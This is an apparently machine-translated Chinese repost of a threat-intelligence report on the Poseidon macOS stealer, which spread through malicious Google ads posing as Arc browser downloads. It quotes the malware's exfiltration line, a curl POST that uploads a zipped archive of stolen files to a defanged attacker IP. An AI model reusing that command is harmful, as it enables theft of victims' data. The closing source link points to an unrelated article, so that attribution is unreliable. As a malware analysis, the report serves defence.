Poseidon窃取程序通过Google广告感染Mac用户
6月24日,我们观察到一个新的活动,通过Arc浏览器的恶意谷歌广告分发一个针对苹果用户的窃取者。这是过去几个月里我们第二次看到Arc被用作诱饵,当然是它受欢迎的标志。它以前被用来投放一个视窗RAT,也是通过谷歌广告。
在最新的活动中被放弃的macOS窃取器正在积极开发为原子窃取器的竞争对手,其大部分代码库与其前身相同。Malware bytes之前将此有效载荷跟踪为OSX. RodStealer,参考其作者Rodrigo4。威胁行为者将新项目重新命名为“波塞冬”,并添加了一些新功能,如掠夺虚拟专用网配置。
在这篇博文中,我们回顾了新的Poseidon活动的广告,从网络犯罪论坛公告到通过恶意广告分发新的Mac恶意软件。
Rodrigo4推出新的公关活动
一个威胁行为者在XSS地下论坛上被称为罗德里戈4,他一直在开发一个与臭名昭著的原子窃取器(AMOS)具有相似功能和代码库的窃取器。该服务由一个带有统计数据的恶意软件面板和一个带有自定义名称、图标和AppleScript的构建器组成。窃取器提供的功能让人想起原子窃取器,包括:文件抓取器、加密钱包提取器、密码管理器(Bitwarden、KeePassXC)窃取器和浏览器数据收集器。
在6月23日星期日最后一次编辑的帖子中,罗德里戈4宣布了他们项目的新品牌:
Rodrigo4在XSS上的论坛帖子
Hello everyone, we have released the V4 update and there are quite a lot of new things.The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.恶意软件作者确实需要宣传,但我们会尽量坚持事实以及我们在积极的恶意软件交付活动中观察到的内容。
通过Google广告分发
我们看到了一个属于“Coles&Co”的Arc浏览器广告,链接到域名arcthost[.]org:
通过Google搜索为Arc浏览器投放恶意广告
点击广告的人被重定向到arc-download[.]com,这是一个完全虚假的网站,仅提供Arc for Mac:
Arc的诱饵网站
下载的DMG文件类似于安装新Mac应用程序时的预期,但右键单击打开技巧以绕过安全保护除外:
恶意Arc DMG安装程序
连接到新的波塞冬项目
新的“波塞冬”窃取程序包含其他人看到的未完成代码,最近还宣传从Fortinet和OpenVPN窃取VPN配置:
摘自具有新VPN功能的论坛帖子
更有趣的是以下命令中显示的数据泄露:
set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @/tmp/out.zip http:// 79.137.192[.]4/p2p\")导航到此IP地址会显示新的Poseidon品牌面板:
波塞冬面板登录页面
结论
Mac恶意软件开发有一个活跃的场景,专注于盗贼。正如我们在这篇文章中看到的,这种犯罪企业有许多促成因素。供应商需要说服潜在客户,他们的产品功能丰富,杀毒软件的检测率很低。
看到分发新恶意软件有效负载的活动证实威胁是真实的,并积极针对新受害者。在下载和安装新应用程序时,需要保持警惕以抵御这些威胁。
参考文章:https://www.bleepingcomputer.com/news/security/ddos-attacks-target-eu-political-parties-as-elections-begin/
图片来源于网络侵权可删
